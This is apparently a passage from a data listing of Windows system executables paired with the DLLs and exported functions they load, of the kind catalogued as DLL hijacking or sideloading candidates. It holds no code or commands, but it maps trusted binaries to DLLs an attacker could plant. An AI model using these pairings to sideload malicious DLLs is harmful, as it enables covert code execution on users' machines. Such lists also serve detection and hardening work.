WinStationEnumerateW
:x:
musnotificationux.exe
Cabinet.dll
DllMain
:x:
musnotificationux.exe
DMCmnUtils.dll
DllMain
:x:
musnotificationux.exe
UpdatePolicy.dll
DllMain
:x:
musnotificationux.exe
UPShared.dll
DllMain
:x:
musnotificationux.exe
WINHTTP.dll
DllMain
:x:
musnotificationux.exe
XmlLite.dll
DllMain
:x:
musnotifyicon.exe
DMCmnUtils.dll
DllMain
:x:
musnotifyicon.exe
UPShared.dll
DllMain
:x:
musnotifyicon.exe
WINHTTP.dll
DllMain
:x:
musnotifyicon.exe
XmlLite.dll
DllMain
:x:
nbtstat.exe
IPHLPAPI.DLL
DllMain
:x:
net.exe
IPHLPAPI.DLL
DllMain
:x:
net.exe
netutils.dll
DllMain
:x:
net.exe
netutils.dll
NetApiBufferAllocate
:x:
net.exe
samcli.dll
DllMain
:x:
net.exe
srvcli.dll
DllMain
:x:
net.exe
wkscli.dll
DllMain
:x:
net1.exe
CRYPTBASE.dll
DllMain
:x:
net1.exe
DSROLE.dll
DllMain
:x:
net1.exe
logoncli.dll
DllMain
:x:
net1.exe
netutils.dll
DllMain
:x:
net1.exe
netutils.dll
NetApiBufferAllocate
:x:
net1.exe
samcli.dll
DllMain
:x:
net1.exe
srvcli.dll
DllMain
:x:
net1.exe
wkscli.dll
DllMain
:x:
netbtugc.exe
dbgcore.DLL
DllMain
:x:
netbtugc.exe
IPHLPAPI.DLL
DllMain
:x:
netbtugc.exe
wdscore.dll
ConstructPartialMsgVA
:x:
netbtugc.exe
wdscore.dll
CurrentIP
:x:
netbtugc.exe
wdscore.dll
DllMain
:x:
netbtugc.exe
wdscore.dll
WdsSetupLogDestroy
:x:
netbtugc.exe
wdscore.dll
WdsSetupLogInit
:x:
netbtugc.exe
wdscore.dll
WdsSetupLogMessageA
:x:
nethost.exe
RASAPI32.dll
DllMain
:x:
nethost.exe
RASAPI32.dll
RasConfigUserProxySettingsW
:x:
nethost.exe
rasman.dll
DllMain
:x:
nethost.exe
rtutils.dll
DllMain
:x:
nethost.exe
rtutils.dll
TraceRegisterExA
:x:
netiougc.exe
dbgcore.DLL
DllMain
:x:
netiougc.exe
dhcpcsvc.DLL
DllMain
:x:
netiougc.exe
IPHLPAPI.DLL
DllMain
:x:
netiougc.exe
wdscore.dll
ConstructPartialMsgVA
:x:
netiougc.exe
wdscore.dll
CurrentIP
:x:
netiougc.exe
wdscore.dll
DllMain
:x:
netiougc.exe
wdscore.dll
WdsSetupLogDestroy
:x:
netiougc.exe
wdscore.dll
WdsSetupLogInit
:x:
netiougc.exe
wdscore.dll
WdsSetupLogMessageA
:x:
netsh.exe
adsldpc.dll
DllMain
:x:
netsh.exe
AUTHFWCFG.DLL
DllMain
:x:
netsh.exe
AUTHFWCFG.DLL
InitHelperDll
:x:
netsh.exe
Cabinet.dll
DllMain
:x:
netsh.exe
CRYPTBASE.DLL
DllMain
:x:
netsh.exe
DHCPCMONITOR.DLL
DllMain
:x:
netsh.exe
DHCPCMONITOR.DLL
InitHelperDll
:x:
netsh.exe
dhcpcsvc.DLL
DllMain
:x:
netsh.exe
dhcpcsvc6.DLL
DllMain
:x:
netsh.exe
DNSAPI.dll
DllMain
:x:
netsh.exe
dot3api.dll
DllMain
:x:
netsh.exe
DOT3CFG.DLL
DllMain
:x:
netsh.exe
DOT3CFG.DLL
InitHelperDll
:x:
netsh.exe
eappcfg.dll
DllMain
:x:
netsh.exe
eappprxy.dll
DllMain
:x:
netsh.exe
FirewallAPI.dll
DllMain
:x:
netsh.exe
FirewallAPI.dll
FwAlloc
:x:
netsh.exe
FirewallAPI.dll
FwFree
:x:
netsh.exe
fwbase.dll
DllMain
:x:
netsh.exe
fwbase.dll
FwAlloc
:x:
netsh.exe
fwbase.dll
FwBaseAlloc
:x:
netsh.exe
fwbase.dll
FwBaseFree
:x:
netsh.exe
fwbase.dll
FwCriticalSectionCreate
:x:
netsh.exe
fwbase.dll
FwReportErrorAsWinError
:x:
netsh.exe
FWCFG.DLL
DllMain
:x:
netsh.exe
FWCFG.DLL
InitHelperDll
:x:
netsh.exe
FWPolicyIOMgr.dll
DllMain
:x:
netsh.exe
fwpuclnt.dll
DllMain
:x:
netsh.exe
HNETMON.DLL
DllMain
:x:
netsh.exe
HNETMON.DLL
InitHelperDll
:x:
netsh.exe
HTTPAPI.dll
DllMain
:x:
netsh.exe
HTTPAPI.dll
HttpInitialize
:x:
netsh.exe
IFMON.DLL
DllMain
:x:
netsh.exe
IFMON.DLL
InitHelperDll
:x:
netsh.exe
IPHLPAPI.DLL
DllMain
:x:
netsh.exe
IPHLPAPI.DLL
GetDefaultCompartmentId
:x:
netsh.exe
ktmw32.dll
CreateTransaction
:x:
netsh.exe
ktmw32.dll
DllMain
:x:
netsh.exe
mintdh.dll
DllMain
:x:
netsh.exe
mintdh.dll
TdhpSetWbemExtensionBlock
:x:
netsh.exe
MobileNetworking.dll
DllMain
:x:
netsh.exe
NDFAPI.DLL
DllMain
:x:
netsh.exe
NETIOHLP.DLL
DllMain
:x:
netsh.exe
NETIOHLP.DLL
InitHelperDll
:x:
netsh.exe
netshell.dll
DllMain
:x:
netsh.exe
NETTRACE.DLL
DllMain
:x:
netsh.exe
NETTRACE.DLL
InitHelperDll
:x:
netsh.exe
nlaapi.dll
DllMain
:x:
netsh.exe
NSHHTTP.DLL
DllMain
:x:
netsh.exe
NSHHTTP.DLL
InitHelperDll
:x:
netsh.exe
NSHIPSEC.DLL
DllMain
:x:
netsh.exe
NSHIPSEC.DLL
InitHelperDll
:x:
netsh.exe
NSHWFP.DLL
DllMain
:x:
netsh.exe
NSHWFP.DLL
InitHelperDll
:x:
netsh.exe
OneX.DLL
DllMain
:x:
netsh.exe
P2P.dll
DllMain
:x:
netsh.exe
P2PNETSH.DLL
DllMain
:x:
netsh.exe
P2PNETSH.DLL
InitHelperDll
:x:
netsh.exe
PEERDISTSH.DLL
DllMain
:x:
netsh.exe
PEERDISTSH.DLL
InitHelperDll
:x:
netsh.exe
POLSTORE.DLL
DllMain
:x:
netsh.exe
POLSTORE.DLL
IPSecOpenPolicyStore
:x:
netsh.exe
RASAPI32.dll
DllMain
:x:
netsh.exe
rasman.dll
DllMain
:x:
netsh.exe
RASMONTR.DLL
DllMain
:x:
netsh.exe
RASMONTR.DLL
InitHelperDll
:x:
netsh.exe
RMCLIENT.dll
DllMain
:x:
netsh.exe
RPCNSH.DLL
DllMain
:x:
netsh.exe
RPCNSH.DLL
InitHelperDll
:x:
netsh.exe
SLC.dll
DllMain
:x:
netsh.exe
SLC.dll
SLRegisterWindowsEvent
:x:
netsh.exe
sppc.dll
DllMain
:x:
netsh.exe
sppc.dll
SLRegisterEvent
:x:
netsh.exe
SspiCli.dll
DllMain
:x:
netsh.exe
USERENV.dll
DllMain
:x:
netsh.exe
USERENV.dll
RegisterGPNotification
:x:
netsh.exe
wcmapi.dll
DllMain
:x:
netsh.exe
WCNNETSH.DLL
DllMain
:x:
netsh.exe
WCNNETSH.DLL
InitHelperDll
:x:
netsh.exe
wdi.dll
DllMain
:x:
netsh.exe
wevtapi.dll
DllMain
:x:
netsh.exe
WHHELPER.DLL
DllMain
:x:
netsh.exe
WHHELPER.DLL
InitHelperDll
:x:
netsh.exe
WINHTTP.dll
DllMain
:x:
netsh.exe
WINIPSEC.DLL
DllMain
:x:
netsh.exe
WINNSI.DLL
DllMain
:x:
netsh.exe
wlanapi.dll
DllMain
:x:
netsh.exe
WLANCFG.DLL
DllMain
:x:
netsh.exe
WLANCFG.DLL
InitHelperDll
:x:
netsh.exe
WSHELPER.DLL
DllMain
:x:
netsh.exe
WSHELPER.DLL
InitHelperDll
:x:
netsh.exe
WWANCFG.DLL
DllMain
:x:
netsh.exe
WWANCFG.DLL
InitHelperDll
:x:
netsh.exe
wwapi.dll
DllMain
:x:
netstat.exe
IPHLPAPI.DLL
DllMain
:x:
netstat.exe
IPHLPAPI.DLL
InternalGetIfTable
:x:
netstat.exe
IPHLPAPI.DLL
InternalGetTcpTable2
:x:
netstat.exe
snmpapi.dll
DllMain
:x:
netstat.exe
snmpapi.dll
SnmpTfxOpen
:x:
ngciso.exe
iumbase.DLL
DllMain
:x:
nltest.exe
logoncli.dll
DllMain
:x:
nltest.exe
netutils.dll
DllMain
:x:
nltest.exe
NTDSAPI.dll
DllMain
:x:
nslookup.exe
DNSAPI.dll
DllMain
:x:
nslookup.exe
DNSAPI.dll
DnsQueryConfigAllocEx
:x:
omadmclient.exe
DEVOBJ.dll
DllMain
:x:
omadmclient.exe
DMCfgUtils.dll
DllMain
:x:
omadmclient.exe
DMCmnUtils.dll
DllMain
:x:
omadmclient.exe
dmEnrollEngine.DLL
DllMain
:x:
omadmclient.exe
dmenterprisediagnostics.dll
DllMain
:x:
omadmclient.exe
dmiso8601utils.dll
DllMain
:x:
omadmclient.exe
DMOleAutUtils.dll
DllMain
:x:
omadmclient.exe
dmxmlhelputils.dll
DllMain
:x:
omadmclient.exe
IPHLPAPI.DLL
DllMain
:x:
omadmclient.exe
iri.dll
DllMain
:x:
omadmclient.exe
omadmapi.dll
DllMain
:x:
omadmclient.exe
omadmapi.dll
FreeCommandLineOptions
:x:
omadmclient.exe
omadmapi.dll
OmaDmGetInternalAcctID
:x:
omadmclient.exe
omadmapi.dll
ProcessCommandLine
:x:
omadmclient.exe
policymanager.dll
DllMain
:x:
omadmclient.exe
USERENV.dll
DllMain
:x:
omadmclient.exe
XmlLite.dll
DllMain
:x:
openfiles.exe
netutils.dll
DllMain
:x:
openfiles.exe
srvcli.dll
DllMain
:x:
openfiles.exe
SspiCli.dll
DllMain
:x:
osk.exe
AUDIOSES.DLL
DllMain
:x:
osk.exe
AVRT.dll
DllMain
:x:
osk.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
osk.exe
DEVOBJ.dll
DllMain
:x:
osk.exe
dwmapi.dll
DllMain
:x:
osk.exe
dwmapi.dll
DwmIsCompositionEnabled
:x:
osk.exe
dwmapi.dll
DwmSetWindowAttribute
:x:
osk.exe
ksuser.dll
DllMain
:x:
osk.exe
midimap.dll
DllMain
:x:
osk.exe
midimap.dll
DriverProc
:x:
osk.exe
MMDevAPI.DLL
DllMain
:x:
osk.exe
MSACM32.dll
acmGetVersion
:x:
osk.exe
MSACM32.dll
DllMain
:x:
osk.exe
OLEACC.dll
AccessibleObjectFromWindowTimeout
:x:
osk.exe
OLEACC.dll
AccSetRunningUtilityState
:x:
osk.exe
OLEACC.dll
DllMain
:x:
osk.exe
OLEACC.dll
GetProcessHandleFromHwnd
:x:
osk.exe
OskSupport.dll
DllMain
:x:
osk.exe
OskSupport.dll
InitializeOSKSupport
:x:
osk.exe
OskSupport.dll
UninitializeOSKSupport
:x:
osk.exe
WindowsCodecs.dll
DllMain
:x:
osk.exe
WindowsCodecs.dll
WICCreateImagingFactory_Proxy
:x:
osk.exe
WMsgAPI.dll
DllMain
:x:
pacjsworker.exe
WINHTTP.dll
DllMain
:x:
packageinspector.exe
msi.dll
DllMain
:x:
packageinspector.exe
SLC.dll
DllMain
:x:
packageinspector.exe
SLC.dll
SLGetWindowsInformationDWORD
:x:
packageinspector.exe
sppc.dll
DllMain
:x:
packageinspector.exe
wevtapi.dll
DllMain
:x:
pathping.exe
IPHLPAPI.DLL
DllMain
:x:
pcalua.exe
pcaui.dll
DllMain
:x:
pcalua.exe
wer.dll
DllMain
:x:
pinenrollmentbroker.exe
PROPSYS.dll
DllMain
:x:
pinenrollmentbroker.exe
SspiCli.dll
DllMain
:x:
pktmon.exe
mintdh.dll
DllMain
:x:
pktmon.exe
mintdh.dll
TdhpSetWbemExtensionBlock
:x:
plasrv.exe
Cabinet.dll
DllMain
:x:
plasrv.exe
mintdh.dll
DllMain
:x:
plasrv.exe
mintdh.dll
TdhpSetWbemExtensionBlock
:x:
plasrv.exe
pdh.dll
DllMain
:x:
plasrv.exe
tdh.dll
DllMain
:x:
plasrv.exe
wevtapi.dll
DllMain
:x:
pnpunattend.exe
dbgcore.DLL
DllMain
:x:
pnpunattend.exe
DEVRTL.dll
DllMain
:x:
pnpunattend.exe
newdev.dll
DllMain
:x:
pnpunattend.exe
wdscore.dll
ConstructPartialMsgVW
:x:
pnpunattend.exe
wdscore.dll
CurrentIP
:x:
pnpunattend.exe
wdscore.dll
DllMain
:x:
pnpunattend.exe
wdscore.dll
WdsSetupLogDestroy
:x:
pnpunattend.exe
wdscore.dll
WdsSetupLogInit
:x:
pnpunattend.exe
wdscore.dll
WdsSetupLogMessageW
:x:
presentationhost.exe
CRYPTBASE.DLL
DllMain
:x:
presentationhost.exe
mscoree.dll
CorExitProcess
:x:
presentationhost.exe
mscoree.dll
DllMain
:x:
presentationhost.exe
WININET.dll
DllMain
:x:
presentationsettings.exe
SspiCli.dll
DllMain
:x:
presentationsettings.exe
SspiCli.dll
GetUserNameExW
:x:
printbrmui.exe
IPHLPAPI.DLL
DllMain
:x:
printbrmui.exe
PROPSYS.dll
DllMain
:x:
psr.exe
AEPIC.dll
DllMain
:x:
psr.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
psr.exe
CLDAPI.dll
DllMain
:x:
psr.exe
FLTLIB.DLL
DllMain
:x:
psr.exe
HID.DLL
DllMain
:x:
psr.exe
msdrm.dll
DllMain
:x:
psr.exe
OLEACC.dll
DllMain
:x:
psr.exe
SspiCli.dll
DllMain
:x:
psr.exe
SspiCli.dll
GetUserNameExW
:x:
psr.exe
uireng.dll
DllMain
:x:
psr.exe
uireng.dll
UirInitializeEngine
:x:
psr.exe
XmlLite.dll
DllMain
:x:
query.exe
logoncli.dll
DllMain
:x:
query.exe
netutils.dll
DllMain
:x:
query.exe
REGAPI.dll
DllMain
:x:
query.exe
REGAPI.dll
RegQueryUtilityCommandList
:x:
query.exe
samcli.dll
DllMain
:x:
query.exe
srvcli.dll
DllMain
:x:
query.exe
utildll.dll
DllMain
:x:
query.exe
WINSTA.dll
DllMain
:x:
quickassist.exe
ATL.DLL
AtlComPtrAssign
:x:
quickassist.exe
ATL.DLL
DllMain
:x:
quickassist.exe
CRYPTBASE.DLL
DllMain
:x:
quickassist.exe
CRYPTBASE.DLL
SystemFunction036
:x:
quickassist.exe
d2d1.dll
DllMain
:x:
quickassist.exe
d3d11.dll
DllMain
:x:
quickassist.exe
dcomp.dll
DllMain
:x:
quickassist.exe
dxgi.dll
DllMain
:x:
quickassist.exe
PROPSYS.dll
DllMain
:x:
quickassist.exe
PROPSYS.dll
VariantToStringWithDefault
:x:
quickassist.exe
SAS.dll
DllMain
:x:
quickassist.exe
SspiCli.dll
AcquireCredentialsHandleA
:x:
quickassist.exe
SspiCli.dll
DllMain
:x:
quickassist.exe
SspiCli.dll
GetUserNameExA
:x:
quickassist.exe
SspiCli.dll
GetUserNameExW
:x:
quickassist.exe
SspiCli.dll
InitializeSecurityContextA
:x:
quickassist.exe
SspiCli.dll
QueryContextAttributesExA
:x:
quickassist.exe
UxTheme.dll
DllMain
:x:
quickassist.exe
UxTheme.dll
SetWindowThemeAttribute
:x:
quickassist.exe
WindowsCodecs.dll
DllMain
:x:
quickassist.exe
WININET.dll
AppCacheGetGroupList
:x:
quickassist.exe
WININET.dll
DllMain
:x:
quickassist.exe
WININET.dll
InternetInitializeAutoProxyDll
:x:
quickassist.exe
WININET.dll
InternetOpenW
:x:
quickassist.exe
WININET.dll
InternetSetOptionW
:x:
quser.exe
logoncli.dll
DllMain
:x:
quser.exe
netutils.dll
DllMain
:x:
quser.exe
samcli.dll
DllMain
:x:
quser.exe
srvcli.dll
DllMain
:x:
quser.exe
UTILDLL.dll
DllMain
:x:
quser.exe
UTILDLL.dll
StrConnectState
:x:
quser.exe
WINSTA.dll
DllMain
:x:
quser.exe
WINSTA.dll
WinStationEnumerateW
:x:
qwinsta.exe
logoncli.dll
DllMain
:x:
qwinsta.exe
netutils.dll
DllMain
:x:
qwinsta.exe
samcli.dll
DllMain
:x:
qwinsta.exe
srvcli.dll
DllMain
:x:
qwinsta.exe
UTILDLL.dll
DllMain
:x:
qwinsta.exe
UTILDLL.dll
StrConnectState
:x:
qwinsta.exe
WINSTA.dll
DllMain
:x:
qwinsta.exe
WINSTA.dll
WinStationEnumerateW
:x:
rasautou.exe
MPRAPI.dll
DllMain
:x:
rasautou.exe
rasman.dll
DllMain
:x:
rasautou.exe
rtutils.dll
DllMain
:x:
rasdial.exe
RASAPI32.dll
DllMain
:x:
rasdial.exe
RASAPI32.dll
RasCompleteDialMachineCleanup
:x:
rasdial.exe
RASAPI32.dll
RasEnumConnectionsW
:x:
rasdial.exe
rasman.dll
DllMain
:x:
rasdial.exe
rasman.dll
RasConnectionEnum
:x:
rasdial.exe
rasman.dll
RasInitialize
:x:
rasdial.exe
rtutils.dll
DllMain
:x:
rasdial.exe
rtutils.dll
TracePrintfExA
:x:
rasdial.exe
rtutils.dll
TraceRegisterExA
:x:
raserver.exe
netutils.dll
DllMain
:x:
raserver.exe
samcli.dll
DllMain
:x:
raserver.exe
WTSAPI32.dll
DllMain
:x:
rdpclip.exe
CRYPTBASE.DLL
DllMain
:x:
rdpclip.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
rdpclip.exe
DEVOBJ.dll
DevObjDestroyDeviceInfoList
:x:
rdpclip.exe
DEVOBJ.dll
DevObjEnumDeviceInfo
:x:
rdpclip.exe
DEVOBJ.dll
DevObjEnumDeviceInterfaces
:x:
rdpclip.exe
DEVOBJ.dll
DevObjGetClassDevs
:x:
rdpclip.exe
DEVOBJ.dll
DevObjGetDeviceInfoListDetail
:x:
rdpclip.exe
DEVOBJ.dll
DevObjGetDeviceInterfaceDetail
:x:
rdpclip.exe
DEVOBJ.dll
DllMain
:x:
rdpclip.exe
dwmapi.dll
DllMain
:x:
rdpclip.exe
IPHLPAPI.DLL
DllMain
:x:
rdpclip.exe
PROPSYS.dll
DllMain
:x:
rdpclip.exe
srpapi.dll
DllMain
:x:
rdpclip.exe
WINSTA.dll
DllMain
:x:
rdpclip.exe
WINSTA.dll
WinStationNameFromLogonIdW
:x:
rdpclip.exe
WINSTA.dll
WinStationQueryInformationW
:x:
rdpclip.exe
WINSTA.dll
WinStationRegisterConsoleNotification
:x:
rdpclip.exe
WINSTA.dll
WinStationVirtualOpenEx
:x:
rdpclip.exe
WTSAPI32.dll
DllMain
:x:
rdpclip.exe
WTSAPI32.dll
WTSQuerySessionInformationW
:x:
rdpclip.exe
WTSAPI32.dll
WTSRegisterSessionNotification
:x:
rdpclip.exe
WTSAPI32.dll
WTSVirtualChannelOpen
:x:
rdpclip.exe
WTSAPI32.dll
WTSVirtualChannelOpenEx
:x:
rdpsa.exe
SspiCli.dll
DllMain
:x:
rdpsa.exe
WINSTA.dll
DllMain
:x:
rdpsauachelper.exe
WINSTA.dll
DllMain
:x:
rdpsauachelper.exe
WINSTA.dll
WinStationGetAllProcesses
:x:
rdpshell.exe
dwmapi.dll
DllMain
:x:
rdpshell.exe
WINSTA.dll
DllMain
:x:
rdpshell.exe
WINSTA.dll
WinStationGetConnectionProperty
:x:
rdpshell.exe
WTSAPI32.dll
DllMain
:x:
rdvghelper.exe
dwmapi.dll
DllMain
:x:
rdvghelper.exe
WINSTA.dll
DllMain
:x:
rdvghelper.exe
WINSTA.dll
WinStationRegisterConsoleNotification
:x:
rdvghelper.exe
WTSAPI32.dll
DllMain
:x:
rdvghelper.exe
WTSAPI32.dll
WTSRegisterSessionNotification
:x:
reagentc.exe
Cabinet.dll
DllMain
:x:
reagentc.exe
ReAgent.dll
DllMain
:x:
reagentc.exe
ReAgent.dll
WinReGetError
:x:
reagentc.exe
ReAgent.dll
WinReSetError
:x:
recover.exe
DEVOBJ.dll
DllMain
:x:
register-cimprovider.exe
miutils.dll
DllMain
:x:
register-cimprovider.exe
prvdmofcomp.dll
CreateRegisterParameter
:x:
register-cimprovider.exe
prvdmofcomp.dll
DllMain
:x:
rekeywiz.exe
credui.dll
DllMain
:x:
rekeywiz.exe
CRYPTBASE.DLL
DllMain
:x:
rekeywiz.exe
CRYPTUI.dll
DllMain
:x:
rekeywiz.exe
DSROLE.dll
DllMain
:x:
rekeywiz.exe
DSROLE.dll
DsRoleGetPrimaryDomainInformation
:x:
rekeywiz.exe
duser.dll
DllMain
:x:
rekeywiz.exe
EFSADU.dll
DllMain
:x:
rekeywiz.exe
EFSUTIL.dll
DllMain
:x:
rekeywiz.exe
EFSUTIL.dll
EfsUtilApplyGroupPolicy
:x:
rekeywiz.exe
FeClient.dll
DllMain
:x:
rekeywiz.exe
logoncli.dll
DllMain
:x:
rekeywiz.exe
netutils.dll
DllMain
:x:
rekeywiz.exe
USERENV.dll
DllMain
:x:
rekeywiz.exe
VAULTCLI.dll
DllMain
:x:
relog.exe
pdh.dll
DllMain
:x:
relpost.exe
Cabinet.dll
DllMain
:x:
relpost.exe
ReAgent.dll
DllMain
:x:
relpost.exe
wer.dll
DllMain
:x:
repair-bde.exe
BDEREPAIR.dll
DllMain
:x:
reset.exe
logoncli.dll
DllMain
:x:
reset.exe
netutils.dll
DllMain
:x:
reset.exe
REGAPI.dll
DllMain
:x:
reset.exe
REGAPI.dll
RegQueryUtilityCommandList
:x:
reset.exe
samcli.dll
DllMain
:x:
reset.exe
srvcli.dll
DllMain
:x:
reset.exe
utildll.dll
DllMain
:x:
reset.exe
WINSTA.dll
DllMain
:x:
resetengine.exe
bcd.dll
DllMain
:x:
resetengine.exe
Cabinet.dll
DllMain
:x:
resetengine.exe
DismApi.DLL
DllMain
:x:
resetengine.exe
FVEAPI.dll
DllMain
:x:
resetengine.exe
ReAgent.dll
DllMain
:x:
resetengine.exe
ResetEngine.dll
DllMain
:x:
resetengine.exe
tbs.dll
DllMain
:x:
resetengine.exe
VSSAPI.DLL
DllMain
:x:
resetengine.exe
VssTrace.DLL
DllMain
:x:
resetengine.exe
WDSCORE.dll
DllMain
:x:
resetengine.exe
WIMGAPI.DLL
DllMain
:x:
resetengine.exe
WINHTTP.dll
DllMain
:x:
resetengine.exe
WOFUTIL.dll
DllMain
:x:
resetengine.exe
XmlLite.dll
DllMain
:x:
resmon.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
resmon.exe
CLDAPI.dll
DllMain
:x:
resmon.exe
CRYPTBASE.DLL
DllMain
:x:
resmon.exe
edputil.dll
DllMain
:x:
resmon.exe
edputil.dll
EdpGetIsManaged
:x:
resmon.exe
FLTLIB.DLL
DllMain
:x:
resmon.exe
PROPSYS.dll
DllMain
:x:
resmon.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
resmon.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
rmactivate_isv.exe
msdrm.dll
__AddMachineCertToLicenseStore
:x:
rmactivate_isv.exe
msdrm.dll
DllMain
:x:
rmactivate_ssp_isv.exe
CRYPTBASE.dll
DllMain
:x:
rmactivate_ssp_isv.exe
CRYPTBASE.dll
SystemFunction036
:x:
rmactivate.exe
CRYPTBASE.dll
DllMain
:x:
rmactivate.exe
CRYPTBASE.dll
SystemFunction036
:x:
rmactivate.exe
msdrm.dll
__AddMachineCertToLicenseStore
:x:
rmactivate.exe
msdrm.dll
DllMain
:x:
rmttpmvscmgrsvr.exe
DEVOBJ.dll
DllMain
:x:
route.exe
IPHLPAPI.DLL
DllMain
:x:
rpcping.exe
credui.dll
DllMain
:x:
rpcping.exe
SspiCli.dll
DllMain
:x:
rpcping.exe
WINHTTP.dll
DllMain
:x:
rwinsta.exe
logoncli.dll
DllMain
:x:
rwinsta.exe
netutils.dll
DllMain
:x:
rwinsta.exe
samcli.dll
DllMain
:x:
rwinsta.exe
srvcli.dll
DllMain
:x:
rwinsta.exe
utildll.dll
DllMain
:x:
rwinsta.exe
WINSTA.dll
DllMain
:x:
searchfilterhost.exe
TQUERY.DLL
DllMain
:x:
secedit.exe
SCECLI.dll
DllMain
:x:
securityhealthservice.exe
DNSAPI.dll
DllMain
:x:
securityhealthservice.exe
FirewallAPI.dll
DllMain
:x:
securityhealthservice.exe
fwbase.dll
DllMain
:x:
securityhealthservice.exe
fwbase.dll
FwCriticalSectionCreate
:x:
securityhealthservice.exe
fwbase.dll
FwCriticalSectionDestroy
:x:
securityhealthservice.exe
USERENV.dll
DllMain
:x:
securityhealthservice.exe
Wldp.dll
DllMain
:x:
securityhealthservice.exe
WTSAPI32.dll
DllMain
:x:
settingsynchost.exe
policymanager.dll
DllMain
:x:
settingsynchost.exe
PROPSYS.dll
DllMain
:x:
settingsynchost.exe
USERENV.dll
DllMain
:x:
setupugc.exe
dbgcore.DLL
DllMain
:x:
setupugc.exe
DNSAPI.dll
DllMain
:x:
setupugc.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
setupugc.exe
WDSCORE.dll
CurrentIP
:x:
setupugc.exe
WDSCORE.dll
DllMain
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogDestroy
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogInit
:x:
setupugc.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
shutdown.exe
SspiCli.dll
DllMain
:x:
slidetoshutdown.exe
d3d10warp.dll
DllMain
:x:
slidetoshutdown.exe
d3d10warp.dll
OpenAdapter10_2
:x:
slui.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
:x:
slui.exe
CLDAPI.dll
DllMain
:x:
slui.exe
CRYPTBASE.DLL
DllMain
:x:
slui.exe
edputil.dll
DllMain
:x:
slui.exe
edputil.dll
EdpGetIsManaged
:x:
slui.exe
FLTLIB.DLL
DllMain
:x:
slui.exe
PROPSYS.dll
DllMain
:x:
slui.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
:x:
slui.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
:x:
slui.exe
sppc.dll
DllMain
:x:
slui.exe
WINBRAND.dll
DllMain
:x:
slui.exe
WTSAPI32.dll
DllMain
:x:
spaceagent.exe
NETUTILS.DLL
DllMain
:x:
spaceagent.exe
SRVCLI.DLL
DllMain
:x:
spectrum.exe
SpectrumSyncClient.dll
DllMain
:x:
spoolsv.exe
DNSAPI.dll
DllMain
:x:
sppextcomobj.exe
adsldpc.dll
DllMain
:x:
sppextcomobj.exe
CRYPTBASE.dll
DllMain
:x:
sppextcomobj.exe
CRYPTBASE.dll
SystemFunction036
:x:
sppextcomobj.exe
DNSAPI.dll
DllMain
:x:
sppsvc.exe
CRYPTXML.dll
DllMain
:x:
sppsvc.exe
webservices.dll
DllMain
:x:
sppsvc.exe
XmlLite.dll
DllMain
:x:
srtasks.exe
bcd.dll
DllMain
:x:
srtasks.exe
ktmw32.dll
DllMain
:x:
srtasks.exe
SPP.dll
DllMain
:x:
srtasks.exe
SRCLIENT.dll
DllMain
:x:
srtasks.exe
SRCORE.dll
DllMain
:x:
srtasks.exe
VSSAPI.DLL
DllMain
:x:
srtasks.exe
VssTrace.DLL
DllMain
:x:
srtasks.exe
wer.dll
DllMain
:x:
stordiag.exe
CRYPTBASE.dll
DllMain
:x:
stordiag.exe
CRYPTBASE.dll
SystemFunction036
:x:
synchost.exe
PROPSYS.dll
DllMain
:x:
sysreseterr.exe
WDSCORE.dll
DllMain
:x:
systeminfo.exe
SspiCli.dll
DllMain
:x:
tabcal.exe
DEVOBJ.dll
DevObjCreateDeviceInfoList
:x:
tabcal.exe
DEVOBJ.dll
DevObjDestroyDeviceInfoList
:x:
tabcal.exe
DEVOBJ.dll
DevObjEnumDeviceInfo
:x:
tabcal.exe
DEVOBJ.dll
DevObjEnumDeviceInterfaces
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetClassDevs
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetDeviceInfoListDetail
:x:
tabcal.exe
DEVOBJ.dll
DevObjGetDeviceInterfaceDetail
:x:
tabcal.exe
DEVOBJ.dll
DllMain
:x:
tabcal.exe
HID.DLL
DllMain
:x:
tabcal.exe
HID.DLL
HidD_GetHidGuid
:x:
tabcal.exe
NInput.dll
DllMain
:x:
takeown.exe
SspiCli.dll
DllMain
:x:
tapiunattend.exe
WDSCORE.dll
ConstructPartialMsgVW
:x:
tapiunattend.exe
WDSCORE.dll
CurrentIP
:x:
tapiunattend.exe
WDSCORE.dll
DllMain
:x:
tapiunattend.exe
WDSCORE.dll
WdsSetupLogMessageW
:x:
tar.exe
archiveint.dll
archive_match_new
:x:
tar.exe
archiveint.dll
DllMain
:x:
taskkill.exe
dbghelp.dll
DllMain
:x:
taskkill.exe
netutils.dll
DllMain
:x:
taskkill.exe
srvcli.dll
DllMain
:x:
taskkill.exe
SspiCli.dll
DllMain
:x:
tasklist.exe
dbghelp.dll
DllMain
:x:
tasklist.exe
netutils.dll
DllMain
:x:
tasklist.exe
srvcli.dll
DllMain
:x:
tasklist.exe
SspiCli.dll
DllMain
:x:
tieringengineservice.exe
CLUSAPI.dll
DllMain
:x:
tieringengineservice.exe
DNSAPI.dll
DllMain
:x:
tieringengineservice.exe
ESENT.dll
DllMain
:x:
tracert.exe
IPHLPAPI.DLL
DllMain
:x:
tscon.exe
logoncli.dll
DllMain
:x:
tscon.exe
netutils.dll
DllMain
:x:
tscon.exe
samcli.dll
DllMain
:x:
tscon.exe
srvcli.dll
DllMain
:x:
tscon.exe
utildll.dll
DllMain
:x:
tscon.exe
WINSTA.dll
DllMain
:x:
tsdiscon.exe
WINSTA.dll
DllMain
:x:
tsdiscon.exe
WINSTA.dll
WinStationNameFromLogonIdW
:x:
tskill.exe
logoncli.dll
DllMain
:x:
tskill.exe
netutils.dll
DllMain
:x:
tskill.exe
samcli.dll
DllMain
:x:
tskill.exe
srvcli.dll
DllMain
:x:
tskill.exe
utildll.dll
DllMain
:x:
tskill.exe
WINSTA.dll
DllMain
:x:
tttracer.exe
